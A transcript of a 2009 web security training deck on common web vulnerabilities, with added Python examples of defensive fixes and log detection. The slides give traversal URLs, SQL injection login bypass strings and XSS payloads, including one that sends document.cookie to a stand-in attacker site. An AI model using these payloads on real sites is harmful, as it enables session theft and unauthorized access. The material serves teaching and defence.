Web Security Overview, Lohika ASC team 2009

Uploaded by reynold-hodges, posted 26-Dec-2015

Page 1: Web Security Overview Lohika ASC team 2009 ad_asc@lohika.com


Page 2: Agenda

The Evolution of Web Applications ........................ 3
Common Web Application Functions ......................... 5
Server/Browser Information Flow and Vulnerabilities ...... 6
The Security Aspects ..................................... 8
Web Security Assessment Main Stages ..................... 10
Web Application Vulnerabilities - Top 10 ................ 14
Path Manipulation Attack ................................ 21
Parameter Manipulation Attack ........................... 25
ASC Products Overview ................................... 36

Page 3: The Evolution of Web Applications

Early days of the Internet:

• Web sites were static docs
• One-way information flow: Server -> Browser
• No authentication/authorization
• Low interest for malicious intruders: no sensitive information stored, everything in public view
• Typically attackers modified the files to deface the site
• Attackers used the server's storage and bandwidth to distribute "warez"

Current days:

• The majority of sites are web applications
• Web applications rely on two-way information flow: Server <-> Browser
• Web applications are different and complicated:
  • Different technologies
  • Registration
  • Login
  • Financial transactions
  • Web search
  • Authoring of content by users
  • Content generated on the fly
  • Content tailored to a specific user

=> Security is a big issue!

Page 4: The Evolution of Web Applications

Rapid evolution of web applications:

• No longer a set of static pages
• Rely on multiple tech layers and concepts to provide interactive content
• Replacing desktop applications in many areas
• Are used everywhere

Page 5: Common Web Application Functions

1. Social Networking
2. Shopping
3. Auctions
4. Web mail
5. Banking
6. Web logs
7. Gambling
8. Web Search
9. Interactive information

Potentially Not Secure

For example: MySpace – Samy Worm, http://namb.la/popular/tech.html

Page 6: Server/Browser Information Flow

Diagram (reconstructed from the slide labels): two-way information flow, Server <-> Browser.

• External User – Browser – Firewall – HTTP Server
• Internal User – Browser – Internal HTTP Server
• Server Infrastructure: Auth Service, Web Service, Database

Page 7: Server/Browser Information Flow and Vulnerabilities

Diagram (reconstructed from the slide labels): the same two-way flow, Server <-> Browser, with the components External User – Browser – Firewall – HTTP Server, Internal User – Browser – Internal HTTP Server, and the Server Infrastructure (Auth Service, Web Service, Database).

Vulnerabilities marked along the flow:

• XML Injection
• Path Traversal
• SQL Injection
• Parameter Tampering
• Forged Token
• XSS
• CSRF
• Local File Include
• Remote File Inclusion

Page 8: The Security Aspect

In recent years, web application security has become a focal point for security experts. Application attacks are constantly on the rise, posing new risks for the organization.

Application security sometimes gets overlooked by Dev, QA or Operations teams for various reasons:

• Risks involved are underestimated / not fully realized
• Lack of competence
• Lack of time

Any business that relies on a vulnerable web application is potentially at risk of a major business impact with serious implications.

Page 9: The Security Aspect

This is a problem

Page 10: Web Security Assessment main stages

Page 11: Map the Application's content

1. Linked Content
   1.1 Explore visible content
   1.2 Consult public resources
2. Other Content
   2.1 Discover hidden content
   2.2 Discover default content
3. Non-standard access methods
   3.1 Identifier-specified functions
   3.2 Debug parameters

Page 12: Analyze the Application

1. Identify functionality
2. Identify data entry points
3. Identify technologies

Attack Vectors

Page 13: Attack patterns and goals

Page 14: Web Application Vulnerabilities Top 10

Injection

• Examples of injection flaws are SQL, XML, LDAP, HTTP header injection (cookies, requests), and OS command injection
• Attacks occur when untrusted data, such as a query, command or argument, is sent to an interpreter
• Vulnerable applications can be tricked into executing unintended commands or allowing the attacker to access and modify data

Cross Site Scripting

• There are three types of XSS attacks: stored, reflected, and DOM based
• XSS attacks occur when an application allows data that is not validated or escaped properly to be sent to a web browser
• Malicious scripts are executed in the victim's browser, allowing the attacker to hijack the user's session, steal cookies, deface web sites, redirect users to malicious web sites, and take remote control of the browser

Page 15: Web Application Vulnerabilities Top 10 (Continued)

Broken Authentication and Session Management

• Users are impersonated due to leaks or flaws in the authentication process
• Attacks occur when a session ID is visible to others, timeouts are not properly set, SSL/TLS is not used, or any other flaw in the authentication scheme is detected
• Flaws used against one account may be replicated against an account with higher privileges

Insecure Direct Object References

• The attack occurs when an authorized user can change a parameter value that refers to a system object that they are not authorized for
• Almost any reference that can be reached by URL is affected, including references to files, paths, database keys, and reflection by class name (e.g. JDBC connector class)
• Remote referencing includes Web Services, CORBA, RMI, RPC

Page 16: Web Application Vulnerabilities Top 10 (Continued)

Cross Site Request Forgery (CSRF)

• The attacker creates malicious code to generate a forged request that the attacker tricks the victim into submitting
• Forged requests can be hidden in image tags, XSS attacks and a number of other techniques
• CSRF attacks can complete any transaction that the victim is permitted to perform, such as accessing data, transferring funds or making purchases

Security Misconfiguration

• The attacker exploits unsecured pages, default accounts, unpatched flaws or any other vulnerability that could have been addressed by proper configuration
• These attacks can result in a complete system compromise

Page 17: Web Application Vulnerabilities Top 10 (Continued)

Failure to Restrict URL Access

• This attack takes place when an authorized user can simply change a URL to access a privileged page
• Attackers generally look for administrative functions to employ this attack on
• Links can be obtained from hidden fields, client-side code, robots.txt, configuration files, static XML files, and directory access

Unvalidated Redirects and Forwards

• An unvalidated parameter allows an attacker to choose the destination page where they wish to send a victim, to trick them into disclosing private information
• Victims trust these links because the link is to a valid site

Page 18: Web Application Vulnerabilities Top 10 (Continued)

Insecure Cryptographic Storage

• The most common reason for this attack is that data that should be encrypted is stored in cleartext
• Can result from the poor use of encryption algorithms, such as using home-grown algorithms, insecure use of strong algorithms or the continued use of proven weak algorithms
• The use of weak or unsalted hashes to protect passwords is another common flaw that leads to this risk

Insufficient Transport Layer Protection

• Most commonly, this attack occurs when a site does not use SSL/TLS for pages that require authentication, where an attacker can monitor network traffic to steal an authenticated user's session cookie
• Poorly configured SSL certificates can lull a user into accepting warnings for legitimate sites, only to be tricked into accepting a phishing site's certificate
• Attacks can lead to account theft, phishing attacks and admin accounts being compromised

Page 19: Path Manipulation attacks and Parameter Manipulation attacks

Page 20: Attack Techniques

Among the most dangerous and most common attack techniques are:

Path manipulation:

• Directory Indexing
• Path Traversal
• Predictable resource location
• Path Truncation

Parameter manipulation:

• Abnormal input
• Brute Force Authentication Attack
• SQL Injection
• SOAP Injection
• Command Execution
• Cross Site Scripting (XSS)

Page 21: Path manipulation: 1. Directory Indexing

Automatic directory listing/indexing is a web server function that lists all of the files within a requested directory.

The following information could be obtained based on directory indexing data:

• Backup files
• Temporary files
• Hidden files
• Naming conventions
• Configuration file contents
• Script contents

Note: the listing is served only when the directory's normal base file (index.html/home.html/default.htm) is not present.

Page 22: Path manipulation: 2. Path Truncation

Path truncation attacks are requests for known directories without filenames. This may cause directory listings to be displayed.

Example:

1. Given the following URL: http://www.site.com/folder1/folder2/file.asp
2. truncating the path to look for http://www.site.com/folder1/folder2/
3. and http://www.site.com/folder1/

may cause the web server to reveal directory contents or to cause unhandled exceptions.

Page 23: Path manipulation: 3. Path Traversal

These attacks are expressions in the URI that will cause the web server to display the contents of files above the webroot.

Example:

1. Given the following URL: http://www.site.com/folder1/../../../../../../../boot.ini
2. Or the following: http://www.site.com/getnews.php?name=../../../../../../boot.ini

This can occur when the web application uses the string to specify a file location without first completely parsing out traversal characters.
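The canonicalize-then-check approach the slide alludes to ("completely parsing out traversal characters"), as an added example that is not part of the original deck. It assumes a web root of /var/www/html and a hypothetical getnews handler; the decision is made on the normalized final path rather than by deleting "../" substrings, so the plain, percent-encoded, backslash and absolute-path variants are all caught by the same rule.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed document root for the example (not from the original slides).
WEBROOT = "/var/www/html"


def resolve_under_root(root: str, requested: str) -> Optional[str]:
    """Map a user-supplied file name (such as the getnews.php?name= value)
    to an absolute path, or return None if it would escape the web root.

    The check is made on the canonical form of the whole path, not by
    stripping '../' sequences, so every variant is judged by one rule:
    the final path must still lie inside root.
    """
    root = posixpath.normpath(root)
    # The web server decodes percent-encoding once; do the same here so
    # "%2e%2e/" is judged as "../".
    decoded = unquote(requested)
    # Treat backslashes as separators so Windows-style traversal is not
    # smuggled past a POSIX-only check.
    decoded = decoded.replace("\\", "/")
    # An embedded NUL has no legitimate place in a file name (the null byte
    # "abnormal input" from the same deck).
    if "\x00" in decoded:
        return None
    # posixpath.join returns the second argument unchanged if it is absolute,
    # so "/etc/passwd" is never glued under the root and fails the check.
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    # Accept only if, after collapsing every "..", the canonical path still
    # has root as its prefix, component by component.
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


def serve_news(name: str) -> str:
    """What a hardened getnews handler (hypothetical) does before opening a file."""
    path = resolve_under_root(WEBROOT, name)
    if path is None:
        return "400 Bad Request: file name escapes the web root"
    return f"200 OK: would open {path}"


if __name__ == "__main__":
    # Constructed inputs: one ordinary request, then the traversal strings
    # from the slide in plain, percent-encoded, backslash and absolute forms.
    for sample in [
        "news/2009-01.txt",
        "../../../../../../boot.ini",
        "%2e%2e/%2e%2e/%2e%2e/boot.ini",
        "..\\..\\..\\windows\\win.ini",
        "/etc/passwd",
    ]:
        print(f"{sample!r:45} -> {serve_news(sample)}")
```

The same check belongs in front of every file open that takes its name from a request parameter; note that it only decides whether the path stays under the root, so the application must still apply its own authorization to what lies inside it.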

Page 24: Path manipulation: 4. Predictable Resource location. Directory enumeration

Directory enumeration lists all directory paths and possibilities on the application server, including hidden directories that could possibly contain sensitive information.

Page 25: Parameter manipulation: Where can we find the entry points of a web application?

• HTTP GET request with query parameters
• HTTP POST request with parameters
• HTTP Cookies
• Custom HTTP headers

Page 26: Parameter manipulation: 1. Abnormal input (parameter overflow)

Abnormal input attack strings are composed of characters that can cause unhandled exceptions. Unhandled exceptions often cause error messages to be displayed that disclose sensitive information about the application's internal mechanics. Source code may even be disclosed.

Example:

1. Given the following URL: http://www.site.com/cgi-bin/process.pl?id=%00 (where %00 is the poisonous null byte)
2. Or the following: http://www.site.com/cgi-bin/process.pl?id=99999999999999999
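Defender-side detection for the two probes on this slide and for the traversal strings on the path manipulation slides, written as an added example that is not from the original deck. The access-log lines are constructed for the example, the hypothetical application's MAX_ID_DIGITS threshold is an assumption, and the scanner flags null bytes, traversal sequences and over-long numeric parameters as they appear in the request line.

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines in the Combined Log Format (not from the
# slides); the request strings mirror the examples the slides show.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2009:10:01:01 +0000] "GET /getnews.php?name=today.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2009:10:01:05 +0000] "GET /getnews.php?name=../../../../../../boot.ini HTTP/1.1" 200 220 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2009:10:02:10 +0000] "GET /cgi-bin/process.pl?id=%00 HTTP/1.1" 500 301 "-" "curl/7.19"
198.51.100.7 - - [10/Mar/2009:10:02:12 +0000] "GET /cgi-bin/process.pl?id=99999999999999999 HTTP/1.1" 500 298 "-" "curl/7.19"
203.0.113.9 - - [10/Mar/2009:10:03:00 +0000] "GET /folder1/%2e%2e/%2e%2e/%2e%2e/boot.ini HTTP/1.1" 404 180 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2009:10:03:30 +0000] "GET /login.php?name=Vlad&password=12345 HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

# Combined Log Format: client identd user [time] "method target proto" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Longest integer id the hypothetical application legitimately issues (assumed).
MAX_ID_DIGITS = 10

# A ".." path component, after separators have been normalized to "/".
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")


def classify_target(target: str) -> List[str]:
    """Return the reasons a request target looks like a probe (empty if clean)."""
    reasons = []
    parts = urlsplit(target)
    # Decode once, as the server does, so %2e%2e and %00 are seen as ".." and NUL.
    path = unquote(parts.path)
    if "\x00" in path or "\x00" in unquote(parts.query):
        reasons.append("null byte in request")
    if TRAVERSAL_RE.search(path.replace("\\", "/")):
        reasons.append("directory traversal in path")
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if TRAVERSAL_RE.search(value.replace("\\", "/")):
            reasons.append(f"directory traversal in parameter {key!r}")
        if value.isdigit() and len(value) > MAX_ID_DIGITS:
            reasons.append(f"oversized numeric value in parameter {key!r}")
    return reasons


def scan_log(text: str) -> List[Tuple[str, str, List[str]]]:
    """Parse each log line and return (client, target, reasons) for flagged ones."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real pipeline would count these too
        reasons = classify_target(m.group("target"))
        if reasons:
            hits.append((m.group("client"), m.group("target"), reasons))
    return hits


if __name__ == "__main__":
    for client, target, reasons in scan_log(SAMPLE_LOG):
        print(f"{client:14} {target:55} {'; '.join(reasons)}")
```

The numeric threshold is the part to tune per application; the null-byte and traversal rules are safe to alert on as written, since neither pattern occurs in a legitimate request to these handlers.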

Page 27: Parameter manipulation: 2. Brute Force authentication attack

The brute force attack is a method of obtaining a user's authentication credentials.

Using brute force, attackers attempt combinations of the accepted character set in order to find a specific combination that gains access to the authorized area.

Page 28: Parameter manipulation: 3. SQL injection

Incorrectly filtered escape characters: this form of SQL injection occurs when user input is not filtered for escape characters and is then passed into a SQL statement. This results in the potential manipulation of the statements performed on the database by the end user of the application.

Example of the intended query:

SQL query: SELECT `id`,`login`,`pass` FROM `users` WHERE login='admin' AND pass='qwert';

Identify the availability of SQL injection:

?login=aaa' (get error: You have an error in your SQL syntax…)

Simple injection with 'OR true' construction:

?login=aaa' OR 1=1 OR 'bbb (use "or 1=1" signatures)

SQL query: SELECT `id`,`login`,`pass` FROM `users` WHERE login='aaa' OR 1=1 OR 'bbb' AND pass='qwert';

Page 29: Parameter manipulation: 3. SQL injection

Page 30: Parameter manipulation: 3. SQL injection

Example:

1. Given the following URL: http://www.site.com/login.php?name=Vlad&password=12345
2. After login the "Welcome Vlad to our site" message appears on the site page
3. What happens if the user name is the following: http://www.site.com/login.php?name=anyuser' OR 1=1 --&password=unknown
4. Of course, the SQL query becomes: SELECT `id`,`login`,`pass` FROM `users` WHERE login='anyuser' OR 1=1 --' AND pass='unknown';
5. You are logged in as anyuser!!!
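The login.php query from slides 28 and 30 beside its parameterized form, as an added example that is not taken from the original deck. It uses an in-memory SQLite table with constructed rows (the column names follow the slide; the user records are invented). The vulnerable function reproduces the bypass the slide walks through; the safe one shows that the same input is inert when it travels as a bound parameter.

```python
import sqlite3
from typing import Optional

# In-memory stand-in for the slides' `users` table (constructed sample data,
# not from the original deck). Passwords are kept in clear text only to
# mirror the slide's query; a real system stores salted password hashes.
DB = sqlite3.connect(":memory:")
DB.executescript(
    """
    CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pass TEXT);
    INSERT INTO users (login, pass) VALUES ('admin', 'qwert');
    INSERT INTO users (login, pass) VALUES ('Vlad', '12345');
    """
)


def login_vulnerable(name: str, password: str) -> Optional[str]:
    """login.php as the slide describes it: the parameters are pasted straight
    into the statement, so a quote in `name` rewrites the WHERE clause and
    `--` comments out the password check."""
    sql = (
        "SELECT id, login, pass FROM users "
        f"WHERE login='{name}' AND pass='{password}'"
    )
    row = DB.execute(sql).fetchone()
    return row[1] if row else None


def login_safe(name: str, password: str) -> Optional[str]:
    """Same lookup as a parameterized query: the driver passes `name` and
    `password` as values, never as SQL text, so 1=1 and -- are just characters
    to compare against the login column."""
    sql = "SELECT id, login, pass FROM users WHERE login=? AND pass=?"
    row = DB.execute(sql, (name, password)).fetchone()
    return row[1] if row else None


if __name__ == "__main__":
    # The slide's two requests: a real login, then the forged user name.
    for name, password in [("Vlad", "12345"), ("anyuser' OR 1=1 --", "unknown")]:
        print(f"name={name!r}")
        print(f"  concatenated query -> logged in as {login_vulnerable(name, password)!r}")
        print(f"  parameterized query -> logged in as {login_safe(name, password)!r}")
```

Which row the vulnerable version returns for the forged name depends only on scan order, which is why the slide can say "logged in as anyuser" while the database hands back whichever user comes first; the parameterized version returns nothing because no login column equals the literal string "anyuser' OR 1=1 --".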

Page 31: Parameter manipulation: 5. Cross Site Scripting

Diagram (reconstructed from the slide labels): a popular web portal (forum, gallery, livejournal, etc.) delivers code injected into the client side (web browser) to several users, each of them a victim.

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allows code injection by malicious web users into the web pages viewed by other users.

Page 32: Parameter manipulation: 5. Cross Site Scripting

Simple XSS Attack

Example: http://myserver.com/test.jsp?name=Stefan

<HTML>
<Body> Welcome Stefan </Body>
</HTML>

Page 33: Parameter manipulation: 5. Cross Site Scripting

http://myserver.com/welcome.jsp?name=<script>alert("Attacked")</script>

<HTML>
<Body>
Welcome <script>alert("Attacked")</script>
</Body>
</HTML>

Page 34: Parameter manipulation: 5. Cross Site Scripting

Example (continued):

6. Try to log in under the following user name: http://www.site.com/login.php?name=<script>alert(111);</script>' OR '1=1#&password=…
7. After login the "Welcome <script>alert(111);</script>' OR '1=1# to our site" message appears in the HTML source of this page. As a result, a popup message box with "111" appears – it is XSS!!!
8. What happens if the user name is the following: <script>alert(document.cookies);</script>' OR ='1
9. And what happens if the user name is the following: <script> document.writeln("<img src=http://myhackersite.com/?a=" + document.cookie + ">" ); </script>' OR 1=1#
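Output encoding for the welcome page from slides 32 to 34, as an added example that is not part of the original deck. The page template and the helper names are assumptions; it contrasts the verbatim rendering the slides show with the same page after HTML escaping of the name parameter, which is the fix for the reflected case the slides build up.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Template standing in for the slides' test.jsp / welcome.jsp (constructed).
PAGE = "<HTML>\n<Body> Welcome {name} to our site </Body>\n</HTML>"


def render_unsafe(name: str) -> str:
    """welcome.jsp as the slide shows it: the parameter is pasted into the
    page verbatim, so markup in `name` becomes markup in the response."""
    return PAGE.format(name=name)


def render_escaped(name: str) -> str:
    """Encode the HTML-significant characters (&, <, >, ', ") so the browser
    shows the value as text; a script tag survives only as &lt;script&gt;."""
    return PAGE.format(name=html.escape(name, quote=True))


def name_from_url(url: str) -> str:
    """Pull the `name` query parameter out of a request URL (decoded once)."""
    values = parse_qs(urlsplit(url).query).get("name", [""])
    return values[0]


def is_script_free(page: str) -> bool:
    """Check used below: does the rendered page contain a live <script> tag?"""
    return "<script" not in page.lower()


if __name__ == "__main__":
    # The slide's two URLs: an ordinary name, then the reflected script.
    for url in [
        "http://myserver.com/test.jsp?name=Stefan",
        'http://myserver.com/welcome.jsp?name=<script>alert("Attacked")</script>',
    ]:
        name = name_from_url(url)
        print(url)
        print("  verbatim:", render_unsafe(name).replace("\n", " "))
        print("  escaped: ", render_escaped(name).replace("\n", " "))
```

Escaping here is for the HTML body context; a value placed inside an attribute, a URL or a JavaScript block needs the encoder for that context. Step 9 on the slide reads document.cookie from script, which is why session cookies are additionally set with the HttpOnly attribute: even where an escaping slip lets a script run, the cookie stays out of its reach.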

Page 35: ASC Products Overview

Page 36: Application Security Center Product Overview

• WebInspect
• QAInspect
• Assessment Management Platform (AMP)

Page 37: Security Center Product Overview – Entire Suite

SecurityInspect

Page 38: Q. A. ?